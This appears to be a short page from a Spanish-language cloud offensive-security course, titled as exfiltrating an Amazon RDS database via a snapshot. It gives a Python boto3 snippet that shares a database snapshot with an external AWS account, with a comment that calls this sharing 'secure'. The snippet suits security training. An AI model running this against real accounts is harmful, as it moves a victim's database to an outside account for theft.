Exfiltracion de un RDS por medio de un snapshot
import boto3
# Crear un cliente de RDS
rds_client = boto3.client('rds')
# Definir el identificador del snapshot
snapshot_identifier = 'my-db-snapshot'
# Definir el ID de la cuenta AWS con la que compartir
account_id = '012345678901'
# Compartir el snapshot de RDS con la cuenta AWS externa de manera segura
rds_client.modify_db_snapshot_attribute(
DBSnapshotIdentifier=snapshot_identifier,
AttributeName='restore',
ValuesToAdd=[account_id]
)AnteriorRemote Code Execution sobre un EC2 para comprometer una BD alojada en RDSSiguienteIntroducción a los Contenedores y la Orquestación
Última actualización